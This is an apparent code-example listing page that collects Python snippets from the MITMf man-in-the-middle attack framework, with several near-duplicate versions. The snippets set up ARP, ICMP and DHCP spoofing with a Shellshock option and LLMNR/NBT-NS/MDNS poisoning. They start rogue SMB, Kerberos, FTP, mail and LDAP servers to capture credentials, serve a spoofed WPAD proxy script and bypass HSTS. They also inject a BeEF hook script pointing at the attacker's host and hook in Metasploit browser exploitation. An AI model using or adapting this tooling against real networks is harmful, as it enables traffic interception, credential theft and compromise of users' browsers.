Esempio n. 1
0
    def finish(self):
        for protocol in self.protocolInstances:
            if hasattr(protocol, 'stop'):
                protocol.stop()

        if not self.manualiptables:
            IpTables.getInstance().Flush()

        SystemConfig.setIpForwarding(0)
Esempio n. 2
0
    def finish(self):
        for protocol in self.protocolInstances:
            if hasattr(protocol, 'stop'):
                protocol.stop()

        if not self.manualiptables:
            IpTables.getInstance().Flush()

        SystemConfig.setIpForwarding(0)
Esempio n. 3
0
	def initialize(self, options):
		self.options    = options
		self.ip_address = SystemConfig.getIP(options.interface)

		Inject.initialize(self, options)

		self.tree_output.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))
		self.onConfigChange()
Esempio n. 4
0
    def initialize(self, options):
        self.options = options
        self.ip_address = SystemConfig.getIP(options.interface)

        Inject.initialize(self, options)

        self.tree_info.append("Mode: {}".format(
            self.config['BeEFAutorun']['mode']))
        self.onConfigChange()
Esempio n. 5
0
    def initialize(self, options):
        self.options = options
        self.msfip   = SystemConfig.getIP(options.interface)
        self.sploited_ips = list()  #store ip of pwned or not vulnerable clients so we don't re-exploit

        #Initialize the BrowserProfiler plugin
        BrowserProfiler.initialize(self, options)
        
        msfversion = Msf().version()
        self.tree_info.append("Connected to Metasploit v{}".format(msfversion))
Esempio n. 6
0
    def initialize(self, options):
        self.options = options
        self.manualiptables = options.manualiptables
        ip_address = SystemConfig.getIP(options.interface)

        if not options.manualiptables:
            if IpTables.getInstance().dns is False:
                IpTables.getInstance().DNS(self.config['MITMf']['DNS']['port'])

        URLMonitor.getInstance().setHstsBypass()
        DNSChef.getInstance().setHstsBypass()
Esempio n. 7
0
    def initialize(self, options):
        self.options = options
        self.manualiptables = options.manualiptables
        ip_address = SystemConfig.getIP(options.interface)

        if not options.manualiptables:
            if IpTables.getInstance().dns is False:
                IpTables.getInstance().DNS(self.config['MITMf']['DNS']['port'])

        URLMonitor.getInstance().setHstsBypass()
        DNSChef.getInstance().setHstsBypass()
Esempio n. 8
0
    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options   = options
        self.interface = options.interface
        self.ourip     = SystemConfig.getIP(options.interface)

        try:
            config = self.config['Responder']
            smbChal = self.config['MITMf']['SMB']['Challenge']
        except Exception as e:
            shutdown('[-] Error parsing config for Responder: ' + str(e))

        LANFingerprinter().start(options)
        MDNSPoisoner().start(options, self.ourip)
        NBTNSPoisoner().start(options, self.ourip)
        LLMNRPoisoner().start(options, self.ourip)

        if options.wpad:
            from core.responder.wpad.WPADPoisoner import WPADPoisoner
            WPADPoisoner().start(options)

        if self.config["Responder"]["MSSQL"].lower() == "on":
            from core.responder.mssql.MSSQLServer import MSSQLServer
            MSSQLServer().start(smbChal)

        if self.config["Responder"]["Kerberos"].lower() == "on":
            from core.responder.kerberos.KERBServer import KERBServer
            KERBServer().start()

        if self.config["Responder"]["FTP"].lower() == "on":
            from core.responder.ftp.FTPServer import FTPServer
            FTPServer().start()

        if self.config["Responder"]["POP"].lower() == "on":
            from core.responder.pop3.POP3Server import POP3Server
            POP3Server().start()

        if self.config["Responder"]["SMTP"].lower() == "on":
            from core.responder.smtp.SMTPServer import SMTPServer
            SMTPServer().start()

        if self.config["Responder"]["IMAP"].lower() == "on":
            from core.responder.imap.IMAPServer import IMAPServer
            IMAPServer().start()

        if self.config["Responder"]["LDAP"].lower() == "on":
            from core.responder.ldap.LDAPServer import LDAPServer
            LDAPServer().start(smbChal)

        if options.analyze:
            self.tree_info.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned")
            self.IsICMPRedirectPlausible(self.ourip)
Esempio n. 9
0
	def initialize(self, options):
		self.options    = options
		self.ip_address = SystemConfig.getIP(options.interface)

		Inject.initialize(self, options)

		self.tree_info.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))

		beefconfig = self.config['MITMf']['BeEF']

		self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(self.ip_address, beefconfig['beefport'])

		self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
		if not self.beef.login(beefconfig['user'], beefconfig['pass']):
			shutdown("[BeEFAutorun] Error logging in to BeEF!")
Esempio n. 10
0
    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options       = options
        self.our_ip        = SystemConfig.getIP(options.interface)
        self.html_src      = options.html_url
        self.js_src        = options.js_url
        self.rate_limit    = options.rate_limit
        self.count_limit   = options.count_limit
        self.per_domain    = options.per_domain
        self.black_ips     = options.black_ips.split(',')
        self.white_ips     = options.white_ips.split(',')
        self.white_domains = options.white_domains.split(',')
        self.black_domains = options.black_domains.split(',')
        self.match_str     = "</body>" or options.match_str
        self.html_payload  = options.html_payload
        self.ctable        = {}
        self.dtable        = {}
        self.count         = 0
        self.mime          = "text/html"

        if not options.preserve_cache:
            CacheKill.initialize(self, options)
Esempio n. 11
0
    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options = options
        self.our_ip = SystemConfig.getIP(options.interface)
        self.html_src = options.html_url
        self.js_src = options.js_url
        self.rate_limit = options.rate_limit
        self.count_limit = options.count_limit
        self.per_domain = options.per_domain
        self.black_ips = options.black_ips.split(',')
        self.white_ips = options.white_ips.split(',')
        self.white_domains = options.white_domains.split(',')
        self.black_domains = options.black_domains.split(',')
        self.match_str = "</body>" or options.match_str
        self.html_payload = options.html_payload
        self.ctable = {}
        self.dtable = {}
        self.count = 0
        self.mime = "text/html"

        if not options.preserve_cache:
            CacheKill.initialize(self, options)
Esempio n. 12
0
	def initialize(self, options):
		self.ourip = SystemConfig.getIP(options.interface)
Esempio n. 13
0
    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options   = options
        self.interface = options.interface
        self.ourip     = SystemConfig.getIP(options.interface)

        try:
            config = self.config['Responder']
            smbChal = self.config['MITMf']['SMB']['Challenge']
        except Exception as e:
            shutdown('[-] Error parsing config for Responder: ' + str(e))

        LANFingerprinter().start(options)
        MDNSPoisoner().start(options, self.ourip)
        NBTNSPoisoner().start(options, self.ourip)
        LLMNRPoisoner().start(options, self.ourip)

        if options.wpad:
            from core.servers.http.HTTPserver import HTTPserver
            import flask
            
            server = HTTPserver.getInstance().server
            
            @server.route('/<wpad_req>')
            def wpad(wpad_req):
                if (wpad_req == 'wpad.dat') or (wpad_req.endswith('.pac')):
                    payload = ConfigWatcher.getInstance().config['Responder']['WPADScript']
                    
                    resp = flask.Response(payload)
                    resp.headers['Server'] = "Microsoft-IIS/6.0"
                    resp.headers['Content-Type'] = "application/x-ns-proxy-autoconfig"
                    resp.headers['X-Powered-By'] = "ASP.NET"
                    resp.headers['Content-Length'] = len(payload)

                    return resp

        if self.config["Responder"]["MSSQL"].lower() == "on":
            from core.responder.mssql.MSSQLServer import MSSQLServer
            MSSQLServer().start(smbChal)

        if self.config["Responder"]["Kerberos"].lower() == "on":
            from core.responder.kerberos.KERBServer import KERBServer
            KERBServer().start()

        if self.config["Responder"]["FTP"].lower() == "on":
            from core.responder.ftp.FTPServer import FTPServer
            FTPServer().start()

        if self.config["Responder"]["POP"].lower() == "on":
            from core.responder.pop3.POP3Server import POP3Server
            POP3Server().start()

        if self.config["Responder"]["SMTP"].lower() == "on":
            from core.responder.smtp.SMTPServer import SMTPServer
            SMTPServer().start()

        if self.config["Responder"]["IMAP"].lower() == "on":
            from core.responder.imap.IMAPServer import IMAPServer
            IMAPServer().start()

        if self.config["Responder"]["LDAP"].lower() == "on":
            from core.responder.ldap.LDAPServer import LDAPServer
            LDAPServer().start(smbChal)

        if options.analyze:
            self.tree_info.append("Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned")
            self.IsICMPRedirectPlausible(self.ourip)
Esempio n. 14
0
    def initialize(self, options):
        self.target_ip = SystemConfig.getIP(options.interface)

        Inject.initialize(options)
        self.html_payload = self._get_data()
Esempio n. 15
0
 def initialize(self, options):
     self.ourip = SystemConfig.getIP(options.interface)
Esempio n. 16
0
    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options = options
        self.dnscfg = self.config['MITMf']['DNS']
        self.dhcpcfg = self.config['Spoof']['DHCP']
        self.targets = options.targets
        self.arpmode = options.arpmode or 'rep'
        self.manualiptables = options.manualiptables
        self.mymac = SystemConfig.getMAC(options.interface)
        self.myip = SystemConfig.getIP(options.interface)
        self.protocolInstances = []

        #Makes scapy more verbose
        debug = False

        if options.arp:

            if not options.gateway:
                shutdown("[-] --arp argument requires --gateway")

            if options.targets is None:
                #if were poisoning whole subnet, start ARP-Watch
                arpwatch = ARPWatch(options.gateway, self.myip,
                                    options.interface)
                arpwatch.debug = debug

                self.tree_info.append("ARPWatch online")
                self.protocolInstances.append(arpwatch)

            arp = ARPpoisoner(options.gateway, options.interface, self.mymac,
                              options.targets)
            arp.arpmode = self.arpmode
            arp.debug = debug

            self.protocolInstances.append(arp)

        elif options.icmp:

            if not options.gateway:
                shutdown("[-] --icmp argument requires --gateway")

            if not options.targets:
                shutdown("[-] --icmp argument requires --targets")

            icmp = ICMPpoisoner(options.interface, options.targets,
                                options.gateway, self.myip)
            icmp.debug = debug

            self.protocolInstances.append(icmp)

        elif options.dhcp:

            if options.targets:
                shutdown("[-] --targets argument invalid when DCHP spoofing")

            dhcp = DHCPServer(options.interface, self.dhcpcfg, self.myip,
                              self.mymac)
            dhcp.shellshock = options.shellshock
            dhcp.debug = debug
            self.protocolInstances.append(dhcp)

        if options.dns:

            if not options.manualiptables:
                if IpTables.getInstance().dns is False:
                    IpTables.getInstance().DNS(self.dnscfg['port'])

        if not options.arp and not options.icmp and not options.dhcp and not options.dns:
            shutdown(
                "[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns")

        SystemConfig.setIpForwarding(1)

        if not options.manualiptables:
            if IpTables.getInstance().http is False:
                IpTables.getInstance().HTTP(options.listen)

        for protocol in self.protocolInstances:
            protocol.start()
Esempio n. 17
0
    def initialize(self, options):
        self.target_ip = SystemConfig.getIP(options.interface)

        Inject.initialize(options)
        self.html_payload = self._get_data()
Esempio n. 18
0
    sys.exit(1)

args = parser.parse_args()

# Definitely a better way to do this, will need to clean this up in the future
# Checks to see if we called a plugin's options without first invoking the actual plugin
for plugin, options in arg_dict.iteritems():
    if vars(args)[plugin] is False:
        for option in options:
            if vars(args)[option.dest]:
                sys.exit(
                    "[-] Called plugin options without invoking the actual plugin (--{})"
                    .format(plugin))

#check to see if we supplied a valid interface
myip = SystemConfig.getIP(args.interface)
mymac = SystemConfig.getMAC(args.interface)

#Start logging
log_level = logging.__dict__[args.log_level.upper()]

logging.basicConfig(level=log_level,
                    format="%(asctime)s %(message)s",
                    datefmt="%Y-%m-%d %H:%M:%S")
logFormatter = logging.Formatter("%(asctime)s %(message)s",
                                 datefmt="%Y-%m-%d %H:%M:%S")
mitmf_logger = logging.getLogger('mitmf')
fileHandler = logging.FileHandler("./logs/mitmf.log")
fileHandler.setFormatter(logFormatter)
mitmf_logger.addHandler(fileHandler)
Esempio n. 19
0
if len(sys.argv) is 1:
    parser.print_help()
    sys.exit(1)

args = parser.parse_args()

# Definitely a better way to do this, will need to clean this up in the future
# Checks to see if we called a plugin's options without first invoking the actual plugin
for plugin, options in arg_dict.iteritems():
    if vars(args)[plugin] is False:
        for option in options:
            if vars(args)[option.dest]:
                sys.exit("[-] Called plugin options without invoking the actual plugin (--{})".format(plugin))

#check to see if we supplied a valid interface
myip  = SystemConfig.getIP(args.interface)
mymac = SystemConfig.getMAC(args.interface)

#Start logging
log_level = logging.__dict__[args.log_level.upper()]

logging.basicConfig(level=log_level, format="%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
logFormatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
mitmf_logger = logging.getLogger('mitmf')
fileHandler = logging.FileHandler("./logs/mitmf.log")
fileHandler.setFormatter(logFormatter)
mitmf_logger.addHandler(fileHandler)

#####################################################################################################

#All our options should be loaded now, initialize the plugins
Esempio n. 20
0
	def initialize(self, options):
		'''Called if plugin is enabled, passed the options namespace'''
		self.options = options
		self.dnscfg = options.configfile['MITMf']['DNS']
		self.dhcpcfg = options.configfile['Spoof']['DHCP']
		self.target = options.target
		self.manualiptables = options.manualiptables
		self.protocolInstances = []

		#Makes scapy more verbose
		debug = False
		if options.log_level is 'debug':
			debug = True

		if options.arp:

			if not options.gateway:
				sys.exit("[-] --arp argument requires --gateway")

			arp = _ARP(options.gateway, options.interface, options.mac_address)
			arp.target = options.target
			arp.arpmode = options.arpmode
			arp.debug = debug

			self.protocolInstances.append(arp)

		elif options.icmp:

			if not options.gateway:
				sys.exit("[-] --icmp argument requires --gateway")

			if not options.target:
				sys.exit("[-] --icmp argument requires --target")

			icmp = _ICMP(options.interface, options.target, options.gateway, options.ip_address)
			icmp.debug = debug

			self.protocolInstances.append(icmp)

		elif options.dhcp:

			if options.target:
				sys.exit("[-] --target argument invalid when DCHP spoofing")

			dhcp = _DHCP(options.interface, self.dhcpcfg, options.ip_address, options.mac_address)
			dhcp.shellshock = options.shellshock
			dhcp.debug = debug
			self.protocolInstances.append(dhcp)

		if options.dns:

			if not options.manualiptables:
				if IpTables.getInstance().dns is False:
					IpTables.getInstance().DNS(options.ip_address, self.dnscfg['port'])

			DNSChef.getInstance().loadRecords(self.dnscfg)

		if not options.arp and not options.icmp and not options.dhcp and not options.dns:
			sys.exit("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns")

		SystemConfig.setIpForwarding(1)

		if not options.manualiptables:
			if IpTables.getInstance().http is False:
				IpTables.getInstance().HTTP(options.listen)

		for protocol in self.protocolInstances:
			protocol.start()
Esempio n. 21
0
    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options           = options
        self.dnscfg            = self.config['MITMf']['DNS']
        self.dhcpcfg           = self.config['Spoof']['DHCP']
        self.targets           = options.targets
        self.arpmode           = 'rep' or options.arpmode
        self.manualiptables    = options.manualiptables
        self.mymac             = SystemConfig.getMAC(options.interface)
        self.myip              = SystemConfig.getIP(options.interface)
        self.protocolInstances = []

        #Makes scapy more verbose
        debug = False

        if options.arp:

            if not options.gateway:
                shutdown("[-] --arp argument requires --gateway")

            if options.targets is None:
                #if were poisoning whole subnet, start ARP-Watch
                arpwatch = ARPWatch(options.gateway, self.myip, options.interface)
                arpwatch.debug = debug

                self.tree_info.append("ARPWatch online")
                self.protocolInstances.append(arpwatch)

            arp = ARPpoisoner(options.gateway, options.interface, self.mymac, options.targets)
            arp.arpmode = self.arpmode
            arp.debug = debug

            self.protocolInstances.append(arp)


        elif options.icmp:

            if not options.gateway:
                shutdown("[-] --icmp argument requires --gateway")

            if not options.targets:
                shutdown("[-] --icmp argument requires --targets")

            icmp = ICMPpoisoner(options.interface, options.targets, options.gateway, self.myip)
            icmp.debug = debug

            self.protocolInstances.append(icmp)

        elif options.dhcp:

            if options.targets:
                shutdown("[-] --targets argument invalid when DCHP spoofing")

            dhcp = DHCPServer(options.interface, self.dhcpcfg, self.myip, self.mymac)
            dhcp.shellshock = options.shellshock
            dhcp.debug = debug
            self.protocolInstances.append(dhcp)

        if options.dns:

            if not options.manualiptables:
                if IpTables.getInstance().dns is False:
                    IpTables.getInstance().DNS(self.dnscfg['port'])

        if not options.arp and not options.icmp and not options.dhcp and not options.dns:
            shutdown("[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns")

        SystemConfig.setIpForwarding(1)

        if not options.manualiptables:
            if IpTables.getInstance().http is False:
                IpTables.getInstance().HTTP(options.listen)

        for protocol in self.protocolInstances:
            protocol.start()
Esempio n. 22
0
    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options = options
        self.dnscfg = options.configfile['MITMf']['DNS']
        self.dhcpcfg = options.configfile['Spoof']['DHCP']
        self.target = options.target
        self.manualiptables = options.manualiptables
        self.protocolInstances = []

        #Makes scapy more verbose
        debug = False
        if options.log_level is 'debug':
            debug = True

        if options.arp:

            if not options.gateway:
                sys.exit("[-] --arp argument requires --gateway")

            arp = _ARP(options.gateway, options.interface, options.mac_address)
            arp.target = options.target
            arp.arpmode = options.arpmode
            arp.debug = debug

            self.protocolInstances.append(arp)

        elif options.icmp:

            if not options.gateway:
                sys.exit("[-] --icmp argument requires --gateway")

            if not options.target:
                sys.exit("[-] --icmp argument requires --target")

            icmp = _ICMP(options.interface, options.target, options.gateway,
                         options.ip_address)
            icmp.debug = debug

            self.protocolInstances.append(icmp)

        elif options.dhcp:

            if options.target:
                sys.exit("[-] --target argument invalid when DCHP spoofing")

            dhcp = _DHCP(options.interface, self.dhcpcfg, options.ip_address,
                         options.mac_address)
            dhcp.shellshock = options.shellshock
            dhcp.debug = debug
            self.protocolInstances.append(dhcp)

        if options.dns:

            if not options.manualiptables:
                if IpTables.getInstance().dns is False:
                    IpTables.getInstance().DNS(options.ip_address,
                                               self.dnscfg['port'])

            DNSChef.getInstance().loadRecords(self.dnscfg)

        if not options.arp and not options.icmp and not options.dhcp and not options.dns:
            sys.exit(
                "[-] Spoof plugin requires --arp, --icmp, --dhcp or --dns")

        SystemConfig.setIpForwarding(1)

        if not options.manualiptables:
            if IpTables.getInstance().http is False:
                IpTables.getInstance().HTTP(options.listen)

        for protocol in self.protocolInstances:
            protocol.start()